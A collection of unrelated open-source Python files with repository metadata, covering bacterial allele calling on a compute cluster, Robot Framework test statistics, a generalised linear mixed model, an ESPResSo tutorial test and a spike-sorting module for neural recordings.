import HTSeq
import sys
from Bio.Seq import Seq
from Bio.Alphabet import generic_dna
from Bio.Blast import NCBIXML
from Bio.Blast.Applications import NcbiblastnCommandline
from Bio.Blast.Applications import NcbiblastpCommandline
from Counter import Counter # --- Counter.py from python3 is needed to run this script --- #
#from collections import Counter
import os
import os.path
import string
import argparse
import subprocess
from CommonFastaFunctions import Create_Blastdb
from CommonFastaFunctions import LoadAlelleFasta
from CommonFastaFunctions import LoadAlellicProfileGeneric
from CommonFastaFunctions import WriteFasta
from CommonFastaFunctions import runBlast
from CommonFastaFunctions import runBlastParser
from Genes import Gene
from Genes import SetOfGenes
import time
import glob
import drmaa
import pickle
import shutil
# ================================================ MAIN ================================================ #
def main():
#time ./alleleCalling_ORFbased_main.py -i asd.txt -g allffn.txt -o out_all_fnn_spades.txt -p True
parser = argparse.ArgumentParser(description="This program screens a set of genes in a fasta file.")
parser.add_argument('-i', nargs='?', type=str, help='List of genome files (list of fasta files)', required=True)
parser.add_argument('-g', nargs='?', type=str, help='List of genes (fasta)', required=True)
parser.add_argument('-o', nargs='?', type=str, help="Name of the output files", required=True)
parser.add_argument('-p', nargs='?', type=str, help="True to give a phyloviz output file type, false is predefined", required=False)
args = parser.parse_args()
genomeFiles = args.i
genes = args.g
phylovizinput=True
if(args.p):
phylovizinput=args.p
print ("Starting Script at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))
listOfCDSDicts = []
listOfGenomes = []
listOfGenomesDict = []
fp = open(genomeFiles, 'r')
for genomeFile in fp:
genomeFile = genomeFile.rstrip('\n')
genomeFile = genomeFile.rstrip('\r')
listOfGenomes.append( genomeFile )
genomeDict = {}
fp.close()
gene_fp = open( genes, 'r')
genepath=''
basepath=''
lGenesFiles = []
argumentsList = []
for gene in gene_fp:
gene = gene.rstrip('\n')
lGenesFiles.append( gene )
genepath=os.path.dirname(gene)
basepath=os.path.join(genepath, "temp")
if not os.path.exists(basepath):
os.makedirs(basepath)
filepath=os.path.join(basepath,str(os.path.basename(gene))+"_argList.txt")
with open(filepath, 'wb') as f:
var = [gene, listOfGenomes]
pickle.dump(var, f)
argumentsList.append(filepath)
# callAlleles([gene, listOfGenomes, listOfCDSDicts, listOfGenomesDict])
gene_fp.close()
# ------------------------------------------------- #
# RUN PRODIGAL OVER ALL GENOMES #
# ------------------------------------------------- #
print ("Starting Prodigal at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))
#poolJobs = Pool()
totgenomes= len(listOfGenomes)
"""for genome in listOfGenomes:
#print genome
#listOfCDSDicts.append(runProdigal(genome))
filepath=os.path.join(basepath,str(os.path.basename(genome))+"_ORF.txt")
with open(filepath, 'wb') as f:
var = runProdigal(genome)
pickle.dump(var, f)"""
joblist =[]
with drmaa.Session() as s:
for genome in listOfGenomes:
#print('Creating job template')
jt = s.createJobTemplate()
#print os.path.join(os.getcwd(), 'callAlleles.py')
jt.remoteCommand = os.path.join(os.getcwd(), 'runProdigal.py')
#print argList
jt.args = [str(genome),basepath]
jt.joinFiles=True
jt.nativeSpecification='-V'
jobid = s.runJob(jt)
joblist.append(jobid)
with open("jobsid.txt","a") as f:
f.write(str(genome)+"\n"+str(jobid))
print('Your job has been submitted with ID %s' % jobid)
#print('Cleaning up')
s.deleteJobTemplate(jt)
s.synchronize(joblist, drmaa.Session.TIMEOUT_WAIT_FOREVER, True)
#for curjob in joblist:
# print 'Collecting job ' + curjob
# retval = s.wait(curjob, drmaa.Session.TIMEOUT_WAIT_FOREVER)
# print 'Job: ' + str(retval.jobId) + ' finished with status ' + str(retval.hasExited)
print ("Finishing Prodigal at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))
# ----------------------------- #
# Each gene has a different job #
# ----------------------------- #
print
print ("Starting Allele Calling at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))
#output=callAlleles([gene, listOfGenomes, listOfCDSDicts, listOfGenomesDict])
#print output
# raise SystemExit
totloci= len(argumentsList)
joblist =[]
with drmaa.Session() as s:
for argList in argumentsList:
#print('Creating job template')
jt = s.createJobTemplate()
#print os.path.join(os.getcwd(), 'callAlleles.py')
jt.remoteCommand = os.path.join(os.getcwd(), 'callAlleles.py')
#print argList
jt.args = [str(argList),basepath]
jt.joinFiles=True
jt.nativeSpecification='-V'
jobid = s.runJob(jt)
joblist.append(jobid)
with open("jobsid.txt","a") as f:
f.write(str(argList)+"\n"+str(jobid))
print('Your job has been submitted with ID %s' % jobid)
#print('Cleaning up')
s.deleteJobTemplate(jt)
#s.synchronize(joblist, drmaa.Session.TIMEOUT_WAIT_FOREVER, True)
for curjob in joblist:
print 'Collecting job ' + curjob
retval = s.wait(curjob, drmaa.Session.TIMEOUT_WAIT_FOREVER)
print 'Job: ' + str(retval.jobId) + ' finished with status ' + str(retval.hasExited)
print ("Finished Allele Calling at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))
output=[]
for gene in lGenesFiles:
filepath=os.path.join(basepath, os.path.basename(gene)+"_result.txt")
with open(filepath,'rb') as f:
var = pickle.load(f)
output.append(var)
shutil.rmtree(basepath)
shutil.rmtree(os.path.join(os.path.dirname(gene), "blastdbs"))
print "##################################################\n %s genomes used for %s loci" % (len(output[0][0]),len(output) )
numberexactmatches=0
for gene in output:
for gAllele in gene[0]:
if("EXC:" in gAllele):
numberexactmatches+=1
print "\n %s exact matches found out of %s" % (numberexactmatches,(len(output[0][0])*len(output)) )
print "\n %s percent of exact matches \n##################################################" % (float((numberexactmatches*100)/(len(output[0][0])*len(output))) )
print "\nWriting output files\n"
args.o = '/' + args.o
if(phylovizinput is False):
genesI=0
for geneOut in output:
i=0
for gAllele in geneOut[0]:
currentGenome = listOfGenomes[i]
currentGenome=currentGenome.split("/")
currentGenome=currentGenome[len(currentGenome)-1].split(".")
gOutFile = os.path.dirname( "./" )
finalname=(args.o).split("/")
gOutFile += "/"+str(currentGenome[0])+finalname[1]
if not os.path.isfile( gOutFile )or (i==0 and genesI==0):
aux = 'w'
else:
aux = 'a'
gAllele = '\n' + gAllele
f = open(gOutFile, aux)
f.write(gAllele + ':' + lGenesFiles[genesI])
f.close()
i+=1
genesI+=1
else:
try:
phylovout=[]
genesnames=[]
statistics=[]
for gene in lGenesFiles:
genename=gene.split("/")
#genename=genename[len(genename)-1].split(".")
genename=genename[len(genename)-1]
genesnames.append(genename)
for geneOut in output:
gene=0
alleleschema=[]
while gene<len(output[0][0]):
alleleschema.append(geneOut[1][gene])
"""genename=(geneOut[1][gene]).split("_")
if(len(genename)!=1):
alleleschema.append(genename[1])
else:
alleleschema.append(genename[0])"""
gene+=1
phylovout.append(alleleschema)
genome=0
finalphylovinput= "FILE"+ "\t"
for geneid in genesnames:
finalphylovinput+= str(geneid)+ "\t"
while genome<len(listOfGenomes):
currentGenome = os.path.basename(listOfGenomes[genome])
statsaux=[0]*6 # EXC INF LNF LOT incomplete SAC
finalphylovinput+= "\n" + currentGenome + "\t"
for gene in phylovout:
val= str(gene[genome])
finalphylovinput+= val + "\t"
if "INF" in val:
statsaux[1]+=1
elif "LNF" in val:
statsaux[2]+=1
elif "LOT" in val:
statsaux[3]+=1
elif "incomplete" in val:
statsaux[4]+=1
elif "small" in val:
statsaux[5]+=1
else:
statsaux[0]+=1
genome+=1
statistics.append(statsaux)
gOutFile = os.path.dirname( "./")
gOutFile += args.o
statswrite='Stats:\tEXC\tINF\tLNF\tLOT\tincomplete\tsmall'
i=0
genome=0
while genome<len(listOfGenomes):
currentGenome = os.path.basename(listOfGenomes[genome])
statsaux=[0]*6 # EXC NA INF LNF LOT incomplete SAC
statswrite+= "\n" + currentGenome + "\t"
for k in statistics[i]:
statswrite+= str(k) + "\t"
i+=1
genome+=1
print statswrite
with open(gOutFile, 'w') as f:
f.write(finalphylovinput)
statoutfile=os.path.dirname( "./")
with open("stastics.txt", 'w') as f:
f.write(str(statswrite))
except Exception as e:
print e
gOutFile = os.path.dirname( "./")
gOutFile += args.o
with open(gOutFile, 'w') as f:
f.write(str(output))
print ("Finished Script at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))
if __name__ == "__main__":
main()
|
mickaelsilva/pythonscripts
|
AlleleCalling/cluster_versions/alleleCalling_ORFbased_main.py
|
Python
|
gpl-2.0
| 9,262
|
[
"BLAST",
"HTSeq"
] |
87d1def22a13e2ea0de17a59c20b353b18d90a0cc6dec3eb70a5033a53cf63fc
|
# Copyright 2008-2014 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robot.utils import elapsed_time_to_string, html_escape, normalize
from .tags import TagPatterns
class Stat(object):
"""Generic statistic object used for storing all the statistic values."""
def __init__(self, name):
#: Human readable identifier of the object these statistics
#: belong to. Either `All Tests` or `Critical Tests` for
#: :class:`~robot.model.totalstatistics.TotalStatistics`,
#: long name of the suite for
#: :class:`~robot.model.suitestatistics.SuiteStatistics`
#: or name of the tag for
#: :class:`~robot.model.tagstatistics.TagStatistics`
self.name = name
#: Number of passed tests.
self.passed = 0
#: Number of failed tests.
self.failed = 0
#: Number of milliseconds it took to execute.
self.elapsed = 0
self._norm_name = normalize(name, ignore='_')
def get_attributes(self, include_label=False, include_elapsed=False,
exclude_empty=False, values_as_strings=False,
html_escape=False):
attrs = {'pass': self.passed, 'fail': self.failed}
attrs.update(self._get_custom_attrs())
if include_label:
attrs['label'] = self.name
if include_elapsed:
attrs['elapsed'] = elapsed_time_to_string(self.elapsed,
include_millis=False)
if exclude_empty:
attrs = dict((k, v) for k, v in attrs.items() if v != '')
if values_as_strings:
attrs = dict((k, unicode(v)) for k, v in attrs.items())
if html_escape:
attrs = dict((k, self._html_escape(v)) for k, v in attrs.items())
return attrs
def _get_custom_attrs(self):
return {}
def _html_escape(self, item):
return html_escape(item) if isinstance(item, basestring) else item
@property
def total(self):
return self.passed + self.failed
def add_test(self, test):
self._update_stats(test)
self._update_elapsed(test)
def _update_stats(self, test):
if test.passed:
self.passed += 1
else:
self.failed += 1
def _update_elapsed(self, test):
self.elapsed += test.elapsedtime
def __cmp__(self, other):
return cmp(self._norm_name, other._norm_name)
def __nonzero__(self):
return not self.failed
def visit(self, visitor):
visitor.visit_stat(self)
class TotalStat(Stat):
"""Stores statistic values for a test run."""
#: Always string `total`
type = 'total'
class SuiteStat(Stat):
"""Stores statistics values for a single suite."""
#: Always string `suite`
type = 'suite'
def __init__(self, suite):
Stat.__init__(self, suite.longname)
#: Identifier of the suite, e.g. `s1-s2`.
self.id = suite.id
#: Number of milliseconds it took to execute this suite,
#: including sub-suites.
self.elapsed = suite.elapsedtime
self._name = suite.name
def _get_custom_attrs(self):
return {'id': self.id, 'name': self._name}
def _update_elapsed(self, test):
pass
def add_stat(self, other):
self.passed += other.passed
self.failed += other.failed
class TagStat(Stat):
"""Stores statistic values for a single tag."""
#: Always string `tag`.
type = 'tag'
def __init__(self, name, doc='', links=None, critical=False,
non_critical=False, combined=''):
Stat.__init__(self, name)
#: Documentation of tag as a string.
self.doc = doc
#: List of tuples in which the first value is the link URL and
#: the second is the link title. An empty list by default.
self.links = links or []
#: ``True`` if tag is considered critical, ``False`` otherwise.
self.critical = critical
#: ``True`` if tag is considered non-critical, ``False`` otherwise.
self.non_critical = non_critical
#: Pattern as a string if the tag is combined,
#: an empty string otherwise.
self.combined = combined
@property
def info(self):
"""Returns additional information of the tag statistics
are about. Either `critical`, `non-critical`, `combined` or an
empty string.
"""
if self.critical:
return 'critical'
if self.non_critical:
return 'non-critical'
if self.combined:
return 'combined'
return ''
def _get_custom_attrs(self):
return {'doc': self.doc, 'links': self._get_links_as_string(),
'info': self.info, 'combined': self.combined}
def _get_links_as_string(self):
return ':::'.join('%s:%s' % (title, url) for url, title in self.links)
def __cmp__(self, other):
return cmp(other.critical, self.critical) \
or cmp(other.non_critical, self.non_critical) \
or cmp(bool(other.combined), bool(self.combined)) \
or Stat.__cmp__(self, other)
class CombinedTagStat(TagStat):
def __init__(self, pattern, name=None, doc='', links=None):
TagStat.__init__(self, name or pattern, doc, links, combined=pattern)
self._matcher = TagPatterns(pattern)
def match(self, tags):
return self._matcher.match(tags)
|
eric-stanley/robotframework
|
src/robot/model/stats.py
|
Python
|
apache-2.0
| 6,017
|
[
"VisIt"
] |
059f181f54a231a45174d2dd688b47e95801198e3a5f47ede044009b3a8994d8
|
from copy import copy
from numpy import asarray, diag, dot, exp
from numpy.linalg import pinv, solve
from glimix_core._ep import EPLinearKernel
from ._glmm import GLMM
class GLMMExpFam(GLMM):
r"""Generalised Linear Gaussian Processes implementation.
It implements inference over GLMMs via the Expectation Propagation [Min01]_
algorithm.
It currently supports the ``"Bernoulli"``, ``"Probit"``, ``"Binomial"``, and
``"Poisson"`` likelihoods. (For heterogeneous Normal likelihood, please refer to
:class:`glimix_core.glmm.GLMMNormal` for a closed-form inference.)
Parameters
----------
y : array_like
Outcome variable.
lik : tuple
Likelihood definition. The first item is one of the following likelihood names:
``"Bernoulli"``, ``"Binomial"``, ``"Normal"``, and ``"Poisson"``. For
`Binomial`, the second item is an array of outcomes.
X : array_like
Covariates.
QS : tuple
Economic eigendecomposition.
Example
-------
.. doctest::
>>> from numpy import dot, sqrt, zeros
>>> from numpy.random import RandomState
>>>
>>> from numpy_sugar.linalg import economic_qs
>>>
>>> from glimix_core.glmm import GLMMExpFam
>>>
>>> random = RandomState(0)
>>> nsamples = 10
>>>
>>> X = random.randn(nsamples, 2)
>>> G = random.randn(nsamples, 100)
>>> K = dot(G, G.T)
>>> ntrials = random.randint(1, 100, nsamples)
>>> z = dot(G, random.randn(100)) / sqrt(100)
>>>
>>> successes = zeros(len(ntrials), int)
>>> for i in range(len(ntrials)):
... successes[i] = sum(z[i] + 0.2 * random.randn(ntrials[i]) > 0)
>>>
>>> QS = economic_qs(K)
>>>
>>> glmm = GLMMExpFam(successes, ('binomial', ntrials), X, QS)
>>> print('Before: %.2f' % glmm.lml())
Before: -16.40
>>> glmm.fit(verbose=False)
>>> print('After: %.2f' % glmm.lml())
After: -13.43
"""
def __init__(self, y, lik, X, QS=None, n_int=1000, rtol=1.49e-05, atol=1.49e-08):
from liknorm import LikNormMachine
GLMM.__init__(self, y, lik, X, QS)
self._ep = EPLinearKernel(self._X.shape[0], rtol=rtol, atol=atol)
self._ep.set_compute_moments(self.compute_moments)
self._machine = LikNormMachine(self._lik[0], n_int)
self.update_approx = True
self._variables.get("beta").listen(self.set_update_approx)
self._variables.get("logscale").listen(self.set_update_approx)
self._variables.get("logitdelta").listen(self.set_update_approx)
def __copy__(self):
gef = GLMMExpFam(self._y, self._lik, self._X, self._QS)
gef.__dict__["_ep"] = copy(self._ep)
gef.__dict__["_ep"].set_compute_moments(gef.compute_moments)
gef.update_approx = self.update_approx
GLMM._copy_to(self, gef)
return gef
def __del__(self):
if hasattr(self, "_machine"):
self._machine.finish()
def _update_approx(self):
if not self.update_approx:
return
self._ep.set_prior(self.mean(), self.covariance())
self.update_approx = False
@property
def beta(self):
return GLMM.beta.fget(self)
@beta.setter
def beta(self, v):
GLMM.beta.fset(self, v)
self.set_update_approx()
def compute_moments(self, eta, tau, moments):
y = (self._y,) + self._lik[1:]
self._machine.moments(y, eta, tau, moments)
def covariance(self):
return dict(QS=self._QS, scale=self.scale, delta=self.delta)
def fit(self, verbose=True, factr=1e5, pgtol=1e-7):
self._ep.verbose = verbose
super(GLMMExpFam, self).fit(verbose=verbose, factr=factr, pgtol=pgtol)
self._ep.verbose = False
def fix(self, var_name):
GLMM.fix(self, var_name)
self.set_update_approx()
def posteriori_mean(self):
r"""Mean of the estimated posteriori.
This is also the maximum a posteriori estimation of the latent variable.
"""
from numpy_sugar.linalg import rsolve
Sigma = self.posteriori_covariance()
eta = self._ep._posterior.eta
return dot(Sigma, eta + rsolve(GLMM.covariance(self), self.mean()))
def posteriori_covariance(self):
r"""Covariance of the estimated posteriori."""
K = GLMM.covariance(self)
tau = self._ep._posterior.tau
return pinv(pinv(K) + diag(1 / tau))
def gradient(self):
r"""Gradient of the log of the marginal likelihood.
Returns
-------
dict
Map between variables to their gradient values.
"""
self._update_approx()
g = self._ep.lml_derivatives(self._X)
ed = exp(-self.logitdelta)
es = exp(self.logscale)
grad = dict()
grad["logitdelta"] = g["delta"] * (ed / (1 + ed)) / (1 + ed)
grad["logscale"] = g["scale"] * es
grad["beta"] = g["mean"]
return grad
@property
def logitdelta(_):
return super().logitdelta
@logitdelta.setter
def logitdelta(self, v):
GLMM.logitdelta.fset(self, v)
self.set_update_approx()
@property
def logscale(_):
return super().logscale
@logscale.setter
def logscale(self, v):
GLMM.logscale.fset(self, v)
self.set_update_approx()
def set_update_approx(self, _=None):
self.update_approx = True
def set_variable_bounds(self, var_name, bounds):
GLMM.set_variable_bounds(self, var_name, bounds)
self.set_update_approx()
@property
def site(self):
return self._ep.site
def unfix(self, var_name):
GLMM.unfix(self, var_name)
self.set_update_approx()
def value(self):
self._update_approx()
return self._ep.lml()
def predictive_mean(self, Xstar, ks, kss):
mstar = self.mean_star(Xstar)
ks = self.covariance_star(ks)
m = self.mean()
eta = self._ep.posterior.eta
tau = self._ep.posterior.tau
mu = eta / tau
K = GLMM.covariance(self)
return mstar + dot(ks, solve(K, mu - m))
def predictive_covariance(self, Xstar, ks, kss):
from numpy_sugar.linalg import sum2diag
kss = self.variance_star(kss)
ks = self.covariance_star(ks)
tau = self._ep.posterior.tau
K = GLMM.covariance(self)
KT = sum2diag(K, 1 / tau)
ktk = solve(KT, ks.T)
b = []
for i in range(len(kss)):
b += [dot(ks[i, :], ktk[:, i])]
b = asarray(b)
return kss - b
|
limix/glimix-core
|
glimix_core/glmm/_expfam.py
|
Python
|
mit
| 6,734
|
[
"Gaussian"
] |
08dbc0e9336f63bf78f20dd7bee86eb55938a9396fe54ab4a3270b29946df6d7
|
# Copyright (C) 2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest as ut
import importlib_wrapper
import os
tutorial, skipIfMissingFeatures = importlib_wrapper.configure_and_import(
"@TUTORIALS_DIR@/active_matter/solutions/enhanced_diffusion.py",
cmd_arguments=[5.0], SAMP_STEPS=500, SAMP_LENGTH=100)
@skipIfMissingFeatures
class Tutorial(ut.TestCase):
system = tutorial.system
def test_file_generation(self):
for name in ["msd_{}_0.dat", "vacf_{}_0.dat", "avacf_{}_0.dat"]:
filepath = os.path.join(tutorial.outdir, name.format(tutorial.vel))
self.assertTrue(
os.path.isfile(filepath),
filepath + " not created")
if __name__ == "__main__":
ut.main()
|
fweik/espresso
|
testsuite/scripts/tutorials/test_active_matter__enhanced_diffusion.py
|
Python
|
gpl-3.0
| 1,395
|
[
"ESPResSo"
] |
063affbb083310f4f0053911e99e8d4318db634701e75a6c53034f0073b03688
|
from numpy import *
import sortUtils as tech
import XKCD as XKCD
import matplotlib.pyplot as plt
import neuroTools as postdoc
from os import mkdir
from os.path import splitext, dirname,basename, isfile, isdir
from scipy.io import savemat,loadmat
from time import time
import cPickle
import json
from matplotlib import rcParams,mlab
rcParams['text.usetex']=True
rcParams['font.size']=16
from brian import *
from brian.library.electrophysiology import *
from brian.library.random_processes import *
from scipy.stats import scoreatpercentile, probplot, percentileofscore
from scipy.stats.mstats import zscore
""" This module takes a DDT file and analyzes the properties of its local field potentials and spike potentials. Each DDT file
contains the continuous voltage trace sampled at 20 kHz from one channel of a PLX recording. For further details on converting
PLX files to DDT or reading DDT files in Python, refer to the documentation in the function read_DDT
One initializes the Recording object by passing to it the filename of the DDT file.
Recording then searches to see if a MAT file with the calculated parameters already exists and so calculates only the
quantities it needs to.
If the DDT file is name abc.DDT then the MAT file is name abd.MAT
The parameters are stored in a dictionary called PARAMETERS and the data in a dictionary called DATA.
The filenames are stores in a dictionary called FILENAMES
Load unfiltered voltage trace
| First local maximum after the first 100 timepoints
|> Filter trace --> Detect spikes as First positive crossing of ---> Collect waveforms as the on either side of the
from energy of (16 * Median absolute deviations) spike time
voltage |
------------------------------------------------------------------------------------------------------------|
|
|> Form a matrix of those waveforms --> Extract the relevant features of that matrix ---> Identify neurons as clusters in the space
--------> Waveforms by discovering its eigenvectors -------------> PC 2
| ----------> Time |
| | |
| | (format to input to |
V V Pycluster) V
Time Waveforms PC1
|
------------------------------------------------------------------------------------------------------------|
|
| silhouettes Parameters and data
|> Verify clusters by ISI intervals ---> Save files in a directory to allow indexing with files from other recordings
"""
class Recording(object):
def __init__(self, filename,verbose=False, test=True):
self.verbose = verbose
self.IO = {}
self.IO['input'] = filename
self.IO['path'] = dirname(splitext(self.IO['input'])[0])
self.IO['name'] = basename(splitext(self.IO['input'])[0])
self.IO['matfile'] = self.IO['name']+'.mat'
self.IO['pickle'] = self.IO['name']+'.pkl'
self.IO['savepath'] = self.IO['path']+'/'+self.IO['name']
self.skip = 1000
'''Let the absolute path of the input file be ../abc.DDT
self.IO['input'] is ../abc.DDT
self.IO['path'] is ../
self.IO['name'] is abc (note the lack of a file extension)
'''
#--------------------------File Handling----------------------------------------------------------------
''' The general approach is to create a directory and save two copies of every piece of analysis that
an instantiation of recording does. This instantiation, once finished running, stores all analysis
in a dictionary called DATA. That and the accompanying PARAMETERS dictionary are written to a MAT
file. Both dictionaries are then written to JSON files.
'''
#-------------------------------------------------------------------------------------------------------
self.parameters = {}
self.parameters['dsp'] = {'fs':20000,'lowcut':300,'highcut':7000}
self.parameters['trace_analysis'] = {'lookahead':100,'lookback':100}
self.parameters['clustering'] = {'N':1,'centroids': None}
self.parameters['PCs'] = 3
'''The following conditional makes sure that a voltage trace is in memory that has been bandpass filtered
between 300 Hz and 7000 Hz using a 2nd order Butterworth forwards and backwards.
'''
if not isfile(self.IO['matfile']):
print 'Loading %s -> ' % self.IO['name'],
self.data = {}
self.data['trace'] = self.load_voltage_trace()
print 'Loaded'
if self.verbose:
print 'Filtering between {} and {} Hz'.format(self.parameters['dsp']['lowcut'],self.parameters['dsp']['highcut'])
print 'Assuming a sampling rate of {} Hz'.format(self.parameters['dsp']['fs'])
if not isfile(self.IO['savepath']+'/'+self.IO['name']+'.filtered'):
self.data['filtered_trace'] = tech.butter_bandpass_filter(self.data['trace'],**self.parameters['dsp'])
with open(self.IO['savepath']+'/'+self.IO['name']+'.filtered','wb') as fid:
self.data['filtered_trace'].tofile(fid)
else:
self.data['filtered_trace'] = fromfile(self.IO['savepath']+'/'+self.IO['name']+'.filtered','float64')
print 'Filtered'
self.data['energy'] = self.data['filtered_trace']*self.data['filtered_trace']
print 'Energy Calculated'
self.populate_fields()
else:
print 'Loading %s from MAT file-> ' % self.IO['name'],
self.data = loadmat(self.IO['matfile'])
print 'Loaded '
self.run()
def run(self):
print 'Saving'
self.save()
print 'Saved'
def populate_fields(self):
print 'Getting constants'
self.data['constants']={}
print 'Getting threshold'
if not isfile(self.IO['savepath']+'/constants.json'):
self.data['constants']['median'] = squeeze(median(self.data['filtered_trace']))
self.data['constants']['mad'] = squeeze(median(absolute(self.data['energy']-median(self.data['energy']))))
self.data['constants']['threshold']= squeeze(16*self.data['constants']['mad']) #Artifacts will be their own cluster
with open(self.IO['savepath']+'/constants.json','wb') as f:
json.dump(self.data['constants'],f)
print 'Saved parameters to its JSON file'
else:
print 'Loading constants from file'
self.data['constants'] = json.load(open(self.IO['savepath']+'/constants.json','rb'))
print 'Got threshold'
print 'Getting spiketimes'
if not isfile(self.IO['savepath']+'/'+self.IO['name']+'.spiketimes'):
self.data['spiketimes'] = tech.detect_spikes(self.data['energy'],self.data['constants']['threshold'])
with open(self.IO['savepath']+'/'+self.IO['name']+'.spiketimes','wb') as fid:
self.data['spiketimes'].tofile(fid)
else:
print 'Loading spiketimes from file'
self.data['spiketimes'] = fromfile(self.IO['savepath']+'/'+self.IO['name']+'.spiketimes','float64')
print 'Got and saved spiketimes'
print 'Getting ISI and waveforms'
self.data['ISI'] = diff(self.data['spiketimes'])
self.data['wfs'] = tech.get_waveforms(self.data['filtered_trace'],self.data['spiketimes'],**self.parameters['trace_analysis'])
with open(self.IO['savepath']+'/'+self.IO['name']+'.waveforms','wb') as fid:
self.data['wfs'].tofile(fid)
print 'Got and saved waveforms'
self.data['PCA'] = dict(zip(['eigvals','projections','eigvecs'],tech.princomp(self.data['wfs'][::self.skip],numpc=self.parameters['PCs'])))
print 'Got PCs'
self.data['clustering'] = tech.cluster(transpose(self.data['PCA']['projections']))
print 'Got Clusters'
def save(self): #God this I/O is a mess
# First, save data
fmt = '%.4f'
if not isdir(self.IO['savepath']):
mkdir(self.IO['savepath'])
'''
#For each, save spiketimes and PCs to their own files
savetxt(self.IO['savepath']+'/'+self.IO['name']+'.txt.spiketimes',self.data['spiketimes'],delimiter='\t')
print 'Saved spiketimes to text file'
'''
for key,value in self.data['PCA'].iteritems():
savetxt(self.IO['savepath']+'/'+self.IO['name']+'.'+key,value,fmt=fmt,delimiter='\t')
print 'Saved principal components %s to text file' % key
for cluster in self.data['clustering']:
for key,value in cluster.iteritems():
if key == 'clustermap':
fmt = '%u'
savetxt(self.IO['savepath']+'/'+self.IO['name']+'.'+key,squeeze(value),fmt=fmt,delimiter='\t')
print 'Saved clustering components %s to text file' % key
'''
with open(self.IO['savepath']+'/constants.json','wb') as f:
json.dump(self.data['constants'],f)
for key,value in self.data.iteritems():
if key not in ['PCA','clustering','trace','filtered_trace','energy','ISI' ]:
#It's better not to save the waveforms, it takes up so much memory,
#easier to dynamically generate them
savetxt(self.IO['savepath']+'/'+self.IO['name']+'.'+key,value,delimiter='\t')
print 'Saved %s to text file' % key
with open(self.IO['savepath']+'/parameters.json','wb') as f:
json.dump(self.parameters,f)
print 'Saved parameters to its JSON file'
'''
# Then, save figures
print 'Saving Voltage Trace'
self.save_voltage_trace()
print 'Saving ISI and Cluster'
self.save_spike_validation()
print 'Saving Waveforms'
self.save_waveforms()
def __repr__(self):
return 'Recording of %s' % self.filename
def load_voltage_trace(self): #later expand to read PLX files
return tech.read_DDT(self.IO['input'])
def visualize(self,kind='trace',xkcd=False):
if kind == 'trace':
self.visualize_voltage_trace(xkcd=False)
def save_voltage_trace(self, xkcd=False):
fig = plt.figure()
trace_panel = fig.add_subplot(211)
start = 20000
stop = 40000
trace_panel.plot(self.data['trace'][(70*start):(80*start):10],'b') #Downsample just for display
trace_panel.set_xlabel(r'Time $\left(ms\right)$')
trace_panel.set_ylabel(r'Voltage $ \left(\mu V \right)$')
spike_panel = fig.add_subplot(212)
spike_panel.plot(self.data['filtered_trace'][(70*start):(80*start):10],'b')
spike_panel.set_xlabel(r'time $\left(ms\right)$')
spike_panel.set_ylabel(r'Voltage $\left(\mu V \right)$')
#Draw threshold
spike_panel.axhline(y=0.25*self.data['constants']['threshold'],linewidth=1,color='r',linestyle='--')
spike_panel.axhline(y=-0.25*self.data['constants']['threshold'],linewidth=1,color='r',linestyle='--')
if xkcd:
for panel in [trace_panel,spike_panel]:
XKCD.XKCDify(trace_panel, expand_axes=True)
plt.savefig(self.IO['savepath']+'/'+self.IO['name']+'_voltage.png',dpi=300)
plt.close()
def save_waveforms(self):
fig = plt.figure()
waveform_panel = fig.add_subplot(211)
waveform_panel.plot(self.data['wfs'][::self.skip])
start = 20000
stop = 40000
energy_panel = fig.add_subplot(212)
energy_panel.plot(self.data['energy'][(70*start):(80*start):10],'b')
energy_panel.set_xlabel(r'time $\left(ms\right)$')
energy_panel.set_ylabel(r'Energy $\left(mV^{2}\right)$')
#Draw threshold
energy_panel.axhline(y=self.data['constants']['threshold'],linewidth=1,color='r',linestyle='--')
plt.savefig(self.IO['savepath']+'/'+self.IO['name']+'_waveforms.png',dpi=300)
def save_spike_validation(self):
#find biggest cluster
final_cluster = sorted(self.data['clustering'],key=lambda attempt: attempt['silhouettes'])[-1]
color = ['r','k','g','b','m','DarkOrange','purple'] #Assume there won't be more than noise and two units
fig = plt.figure()
cluster_panel = fig.add_subplot(211)
clusterx,clustery = tech.toxy(final_cluster['centroids'])
cluster_panel.scatter(clusterx,clustery,c='r',s=40)
hold(True)
nclusters = max(final_cluster['clustermap'])
hold(True)
for n in range(nclusters+1):
x = self.data['PCA']['projections'][0,:][final_cluster['clustermap'] == n]
y = self.data['PCA']['projections'][1,:][final_cluster['clustermap'] == n]
cluster_panel.scatter(x,y,marker='+', c=color[n])
del x
del y
cluster_panel.set_ylabel('PC2')
cluster_panel.set_xlabel('PC1')
postdoc.adjust_spines(cluster_panel,['bottom','left'])
waveform_panel = fig.add_subplot(212)
for n in range(nclusters):
waveform_panel.plot(self.data['wfs'][::self.skip][final_cluster['clustermap']==n],color[n])
waveform_panel.set_xlabel('Time (us)')
waveform_panel.set_ylabel('Voltage (uV)')
postdoc.adjust_spines(waveform_panel,['bottom','left'])
'''
isi_panel = fig.add_subplot(212)
isi_panel.hist(self.data['ISI'],bins=200,range=[0,300], normed=True)
zoomed_isi = fig.add_axes([.65,.25,.2,.2])
zoomed_isi.hist(self.data['ISI'],range=[0,20], normed=True)
isi_panel.set_xlabel('time (ms)')
isi_panel.set_ylabel('density')
postdoc.adjust_spines(isi_panel,['bottom','left'])
'''
